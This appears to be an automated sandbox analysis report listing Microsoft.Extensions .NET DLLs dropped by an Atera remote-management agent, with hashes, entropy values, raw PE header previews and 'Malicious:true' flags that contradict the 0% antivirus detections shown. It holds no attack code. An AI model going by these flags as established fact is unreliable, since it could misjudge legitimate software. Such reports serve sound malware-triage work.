                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:ekfEnkM0vRbJ05axPAONhO+JZIkp5ygv/MFKEpYinAMxCz:LEkMoRxtzIk3ygv/Mp7Hxw
                                                                                                                                                                                                                                        MD5:83CBC69E9A528F906F2EB5B9528FA378
                                                                                                                                                                                                                                        SHA1:0638CA4EB918BD9A7D68C5731D831B57E5D48019
                                                                                                                                                                                                                                        SHA-256:5F7223586AE47F001319524B3A9BC4B635A0D44870733D46FF1BFF780485C4C2
                                                                                                                                                                                                                                        SHA-512:DD817FBDA24F1DC42C83C44D8A301123D5751895F5C542FDF3CF82CA1459B7728D897C3B3C5F1E1915282B7B4968F93ECB6D0DB4ECF80E79093C4F2B47B9420B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*..........." ..0.................. ........... ...............................y....`.................................k...O.......H...............P(..........d...T............................................ ............... ..H............text....... ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........D...X..............H............................................($...*^.($......@...%...}....*:.($.....}....*:.($.....}....*:.($.....}....*:.($.....}....**.-..(....*..s%...z.~....*...0..........(....,..*..(.....o&......&...*...................0...........(.......('...-..,..*.*.(....,.r...p......%...%...((...*..()...*.(....,.r...p......%...%...%...((...*...(*...*.(....,!r...p......%...%...%...%...((...*....(+...*..,&(....,..r...pr...p.((...(,...*..(-...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):33872
                                                                                                                                                                                                                                        Entropy (8bit):6.465515280994496
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Tup+kjcS4GAF7ItpTYbg8lAZnsboXAEpYinAMxCnpD:Ti+YoF7Itmbg82sboZ7HxS
                                                                                                                                                                                                                                        MD5:B4B6928B6ABD9BA62549019FC1B6FF19
                                                                                                                                                                                                                                        SHA1:AFD5DEB02D315D70867335839BA2208DCDD94D88
                                                                                                                                                                                                                                        SHA-256:03BCCF47620E2795ACDF4519C3E21E2C9009908A7B4CF39312DF8560CD3B4815
                                                                                                                                                                                                                                        SHA-512:219472590F21237FBBC3F6F31D4C1320E356C5C13DA41AB0B538A2E9F0788B59E4E847E52177719F90B90BCDF496E21CA5A894E019C5BFF923AEFD1774E07ADF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kq..........." ..0..R...........p... ........... ..............................r.....`.................................;p..O.......8............\..P(..........0o..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc...8............T..............@..@.reloc...............Z..............@..B................op......H.......</..,<..........hk..H....n........................................(....*^.(.......I...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):66640
                                                                                                                                                                                                                                        Entropy (8bit):6.302989427949227
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:syK1UG8tMAv0by0P/vGCnbr1hmiBPIIk+n7Hxu:sykl8tla/nbr1kiBx3nI
                                                                                                                                                                                                                                        MD5:3FCB549ECB9D84B10FEF1727AB043DF0
                                                                                                                                                                                                                                        SHA1:BDA06DB4121EC85DDF7F2259D92CFB90C0C18734
                                                                                                                                                                                                                                        SHA-256:AA96A108023C9FE0A430AAE727F8C8D296B72D781A49E14C73BF5FF33EC792D0
                                                                                                                                                                                                                                        SHA-512:5BBC0A63ACC4D4E3264234D472DD6EE5ABCFB762240B2B868DC344530AA520979C06B02A1BAAF43CD3B293EF3D1F8FDE7341E0413A4A9436473DBE3BF3E4A462
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*t............" ..0.................. ........... .......................@......3.....`.................................i...O.......................P(... ......x...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........R..l...........X.................................................(!...*^.(!......p...%...}....*:.(!.....}....*:.(!.....}....*:.(!.....}....*:.(!.....}....**.-..(....*..s"...z.~....*...0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69712
                                                                                                                                                                                                                                        Entropy (8bit):6.226077670195515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:VsDE/e+9cxoZhNyjcMiJSAopUx+ZA7Hx0:GDE2HozNyjcf4o2Am
                                                                                                                                                                                                                                        MD5:3CE2B431D7D349BABEE6937AD0851309
                                                                                                                                                                                                                                        SHA1:55FF7B9337EAE6B278756C8FCB8C021E04A1AEFD
                                                                                                                                                                                                                                        SHA-256:10E29D6B33B40B7D82298E40A19AC06362B1A51BA5C94C3A7359F5462EB22697
                                                                                                                                                                                                                                        SHA-512:07857ACE3128BFB698EF44524451F6E07596EF48F39F8806428473CABC0C71C2348601519BCC6A58237C919F0E1212021525544C8F8A15CCAAC4912ECEFCDF70
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............" ..0.................. ........... .......................@............`.................................S...O....... ...............P(... ......`...T............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........T..............`.................................................(....*..(....*^.(.......\...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...( ...*..(!...*.(....,.r...p......%...%...%...( ...*...("...*.(....,!r...p......%...%...%...%...( ...*....(#...*..,&(....,..r...pr...p.( ...($...*..(%...*.*.(....,.r...p......%...%...( ...*...(&.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):64080
                                                                                                                                                                                                                                        Entropy (8bit):6.289710606184699
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:M5PhAi33m3UOZsd4IZnuQDLtfjfC67Hxx:gPhAi33mhZiHlvtbfC6P
                                                                                                                                                                                                                                        MD5:31CD265714D3C3120210364A14DD572D
                                                                                                                                                                                                                                        SHA1:C5F8727A6E42429D2CF37B59B8A523844964C623
                                                                                                                                                                                                                                        SHA-256:8FD8996D02C0A89E548069CF924B4E94250C5B4D11261E6D327657F9717E33B6
                                                                                                                                                                                                                                        SHA-512:9B238628C89D4F72638DDDEF2FBB1155DA7917A56BBF749B96855822802ABAA4B76FE003721E17560E802A1B3478A49A3DE7C02F6F45B8DA54028203DB97D511
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S............." ..0.................. ........... .......................@............`.....................................O.......................P(... ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......PO..............X.................................................()...*^.()......N...%...}....*:.().....}....*:.().....}....*:.().....}....*:.().....}....**.-..(....*..s*...z.~....*...0..........(....,..*..(.....o+......&...*..............!....0...........(.......(,...-..,..*.*.(....,.r...p......%...%...(-...*..(....*.(....,.r...p......%...%...%...(-...*...(/...*.(....,!r...p......%...%...%...%...(-...*....(0...*..,&(....,..r...pr...p.(-...(1...*..(2...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28240
                                                                                                                                                                                                                                        Entropy (8bit):6.542681843112789
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:31YBj07ZyQvkBd9aocTPMuiEjYpR6K698kwgcWWxseU7RWsjNyb8E9VF6IYinAMh:l4jUv6iT9jsi8HyeU7L/EpYinAMxClNQ
                                                                                                                                                                                                                                        MD5:5D53FBFB6C56DAB2AFC15E814956483B
                                                                                                                                                                                                                                        SHA1:927D7F1B9D0493FAE2C900B73734E5A323ADDED6
                                                                                                                                                                                                                                        SHA-256:23EE1A91AED2309099858E2E11EC499AD3AD4532E70E0B095DF2CFA118BAA85C
                                                                                                                                                                                                                                        SHA-512:0B775138E8653240D7DD888F6CBE4EFAA9BD7762887D3C9D64F4FC180F41703D8286DEE63B2D09314E8CB98B319C5FB2C9DD1739CE3F207AFA1AD9C3331F29F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oe..........." ..0..<...........Z... ...`....... ....................................`.................................1Z..O....`..L............F..P(..........$Y..T............................................ ............... ..H............text....:... ...<.................. ..`.rsrc...L....`.......>..............@..@.reloc...............D..............@..B................eZ......H........&..d...........\U..H....X........................................(....*^.(.......7...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z.~....*...0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..( ...*.(....,.r...p......%...%...%...(....*...(!...*.(....,!r...p......%...%...%...%...(....*....("...*..,&(....,..r...pr...p.(....(#...*..($...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59472
                                                                                                                                                                                                                                        Entropy (8bit):6.334054400696551
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:t7WAluzJ+Je2PS7kJFT+OUjz+Tf26auuPF1/krd6zkwQRIOIzb7EFEpYinAMxC6z:xJ4V26g1YuuP/2IOe/7Hxp
                                                                                                                                                                                                                                        MD5:5C0ECE8A6364AD65C5D01B762D721F40
                                                                                                                                                                                                                                        SHA1:2CEF9284C94A608269D581A4588E81E485378F3E
                                                                                                                                                                                                                                        SHA-256:A5B60A7BAAA84EA94FEF8704737B6845823A2C1DA0B9F95240CFC61C341FA2FB
                                                                                                                                                                                                                                        SHA-512:E327BF974B9E909C147E67643A7A972F11C2BC3466B622A2286C3E9C0AF003E333A392090314D850DFFB60CE35B05441C8373D9EADEAB4EFFADC9032F2B98566
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0.............:.... ........... ....................... ......#X....`.....................................O.......L...............P(..............T............................................ ............... ..H............text...@.... ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B........................H........H..t...........l.......d.........................................()...*^.()......a...%...}....*:.().....}....*:.().....}....*:.().....}....*:.().....}....**.-..(....*..s*...z..0..l.........~..........(+...*(,........,.r...p(-.......+.r...p(-.....,..ry..p(....-..r}..p.o/...+..+....(0...........*.0..%.........~.......3.(....-..+..%............*F................*..0..<.......r...p..(1...,..*r...p(-.....,..ry..p(....-..r}..p.o/...*.*.*.~....*..0..........(....,..*..(....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21072
                                                                                                                                                                                                                                        Entropy (8bit):6.659500044238884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:UzhlvlfTcbY3SCkWJOVMWs4Nyb8E9VF6IYinAM+oC2aJ8f09:KrfTcbY+uwEpYinAMxCTY2
                                                                                                                                                                                                                                        MD5:DE75610B9B79DB4EE9FF93D756E16D4D
                                                                                                                                                                                                                                        SHA1:2B3BBC1AF7191893FC42A450280ECAD9A5C68FE4
                                                                                                                                                                                                                                        SHA-256:4C036AF950DA497F34F9E325F84A5502DE8AB373559FEE971DACA0AA6C791248
                                                                                                                                                                                                                                        SHA-512:B9CBE72BCA53564FF77C8B02598190966290DF010902114CB7FF91E6831F87B8833984AA2F2E42F9870A28919A32C9C4B4A7A14901E36272F4EA1029C9C06A65
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.}..........." ..0..............=... ...@....... ..............................[U....`.................................-=..O....@..(............*..P(...`......0<..T............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@....... ..............@..@.reloc.......`.......(..............@..B................a=......H.......H"..h....................;........................................(....*^.(.......)...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*J.o....(...+(.....*..(....*.~....*.*.(....*.s.........*.~....*..(....*.*.s.........*:.(......}....*.(....*F(....,........*.*...0............(....-.*..r...p(.........o .....(!...,.*....("......(...+..r...p($

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26192
                                                                                                                                                                                                                                        Entropy (8bit):6.6410774484512896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:T3WWQsE/8iqjnqHTnBdOHFgYVwOU3NW2qFWs/GNyb8E9VF6IYinAM+oCUo0eD05:T3hQsE/8irTnfYFr//OEpYinAMxC1ny
                                                                                                                                                                                                                                        MD5:F07B5825DE2EFB3133BBF61FA2A4CB76
                                                                                                                                                                                                                                        SHA1:B6CC2BE8845C0774E932B2DB1FBCAF788BFBEA9C
                                                                                                                                                                                                                                        SHA-256:A4EEE595F17C9F26EB0DC6694580DD5873938DEF495C524EFFB0D82BC3F4262B
                                                                                                                                                                                                                                        SHA-512:F24E824FE41280C9BC170D9DD1016EFC236650E7762EB115DE02B9593BDBD1649FDE1FCF9B7D387C533AA6BF9651B5AF701ABDD10D2D4B1BB072EBAB1B594DF4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Su..........." ..0..4...........S... ...`....... ...................................`..................................S..O....`..`............>..P(...........R..T............................................ ............... ..H............text....3... ...4.................. ..`.rsrc...`....`.......6..............@..@.reloc...............<..............@..B.................S......H........'..T*.................. R........................................(....*^.(.......5...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*v.r...p(.....o....(...+(.....*..r...p(.....r...p(.....o.....s'...(...+(.....*..r#..p(.....(....&.o.....(...+&.*..("...*.~....*.*.(....*.s.........*.~....*..("...*.*.s.........*...0..x........("....r7..p(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35408
                                                                                                                                                                                                                                        Entropy (8bit):6.577511960397023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6oi0m9/A58Ph+mJ5fvIK0ixTryfCWo/zKeGmquanccOB30RtWW3aUWspNyb8E9V3:KDhbJ5nR02TQCWoJ92tEpYinAMxCtm
                                                                                                                                                                                                                                        MD5:6628C561065DF3B10639846B7F7DC3C3
                                                                                                                                                                                                                                        SHA1:ACBE77E78C99E86866870874A2311DCF4902BAA5
                                                                                                                                                                                                                                        SHA-256:9996C340E4E83C44110028CB28F20E9B24EB126742409FA718F90EA2A16379B2
                                                                                                                                                                                                                                        SHA-512:DB9BC520D226A1E702DAFB2F2F6E0064984854844AE214F52BAB27E9A8B39F9A5AAFF9BE87BE79FA4C5E4B9D134098AE0B72C424D09E057D1B02A75E79C9F810
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u............." ..0..X..........nw... ........... ....................................`..................................w..O....................b..P(...........v..T............................................ ............... ..H............text...tW... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B................Mw......H.......X0..8E...................u........................................("...*^.("......J...%...}....*:.(".....}....*:.(".....}....*:.(".....}....*:.(".....}....**.-..(....*..s#...z:.(".....}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.($.....}....*....0..+........{....oG......+......o%....o&.....X....i2.*:.($.....}....*2.{....oB...*..{....*..0..M........r...p(.....o'...~"...(...+.o'...(...+(*....o'...(...+(*....o'...(...+(*....*..($...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):48208
                                                                                                                                                                                                                                        Entropy (8bit):6.412254540457386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:q7d427HfKy1DQ+SKKKKzqPo6Zkn2qZKqLzZdd0UFxlEpYinAMxCp7VCb:q7d42LfKy3SKKKKr8keqBdd0UFE7Hx0a
                                                                                                                                                                                                                                        MD5:02D75B740B732B9D45BE1C9DEEE82D52
                                                                                                                                                                                                                                        SHA1:145DE3697B7BCCF7F39EF5C1B813F9A213664017
                                                                                                                                                                                                                                        SHA-256:D56BEB31BC6BCF54AE02721D3CE2B6F42D7783483B67DB2B11E5C56E8A29EC38
                                                                                                                                                                                                                                        SHA-512:0E6041D18D62FFBBE4B9906931322F5B3856C462A330922C6264CE99E983811CF139AA52A9C10618AE8035B85B929CBAA3F0DF6FF12D29B9E269E9945C1EB232
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..........." ..0.............Z.... ........... ....................................`.....................................O.......(...............P(..............T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................9.......H.......\?...d...........................................................('...*^.('......W...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*:.('.....}....**.-..(....*..s(...z.~....*...0..........(....,..*..(.....o)......&...*...................0...........(.......(*...-..,..*.*.(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24144
                                                                                                                                                                                                                                        Entropy (8bit):6.63064410442664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:by1x30dJaeTP8pBT7xe3SUDtzWzK0WswNyb8E9VF6IYinAM+oC61mx4iw:bq/eTeABdWIEpYinAMxCa24x
                                                                                                                                                                                                                                        MD5:D73F1C9FDCAA14AA98AD1D62EB4F61E8
                                                                                                                                                                                                                                        SHA1:25180ED081DBAB955DB2E321A42820313FCAC737
                                                                                                                                                                                                                                        SHA-256:5AB6AF65EAAA7BD38B13C2E0A184D241530FD113B6DB218AD6D138A1DCA327E2
                                                                                                                                                                                                                                        SHA-512:35E80F9F724BE46786ABDCC77BA6C4E1065A41F4213ED1B8D25B37C6CF61B7706A5F9AA87A1C5A74C96BC3D2454968541C424D6D1D4B15A64867191A190CFFB4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D3..........." ..0..,..........FK... ...`....... ..............................I(....`..................................J..O....`...............6..P(...........I..T............................................ ............... ..H............text...L+... ...,.................. ..`.rsrc........`......................@..@.reloc...............4..............@..B................%K......H.......0$.. %..................PI........................................(....*^.(.......*...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....**.-..(....*..s....z:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*:.(......}....*..{....*..{....*"..}....*...~....%-.&~..........s....%.....(...+*..r...p(.....o.....o......(...+&.*.0..P.......s ......}!.....}"....r...p(.....{!...r...p(........#...s$...o...+&.o....(...+&.*

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61520
                                                                                                                                                                                                                                        Entropy (8bit):6.349315131405323
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:1g+uGuV+1mb5JtoNIHQs1YyH67beAn9eLfLaV7CvS4vEpYinAMxCkMq:1g+uGuV+1mbaqvy9OfLKMS4I7Hx8q
                                                                                                                                                                                                                                        MD5:64A1C30750E208D114638514140D2FD8
                                                                                                                                                                                                                                        SHA1:98F1BFAE55DE97059C7BC6A53FC6F8254C6A9EB7
                                                                                                                                                                                                                                        SHA-256:E329AF9E6DA9753A31B9908BD6F4655C646C20C088589AF9477515D37F73190B
                                                                                                                                                                                                                                        SHA-512:450FEF2F9C1712CAF22502C9906582EC6DB6D8F6675CFDC78D96BAFF5154675CF52B4A278306FCAD4A231C7E266B8F7690A6FBE23A8DD9455AE0B8FCEDC5505B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....%..........." ..0.................. ........... ....................... ............`.....................................O.......H...............P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........F.....................0.........................................('...*^.('......G...%...}....*:.('.....}....*:.('.....}....*:.('.....}....*:.('.....}....**.-..(....*..s(...z.~....*...0..........(....,..*..(.....o)......&...*...................0...........(.......(*...-..,..*.*.(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):42576
                                                                                                                                                                                                                                        Entropy (8bit):6.373492302570736
                                                                                                                                                                                                                                        Encrypted:false
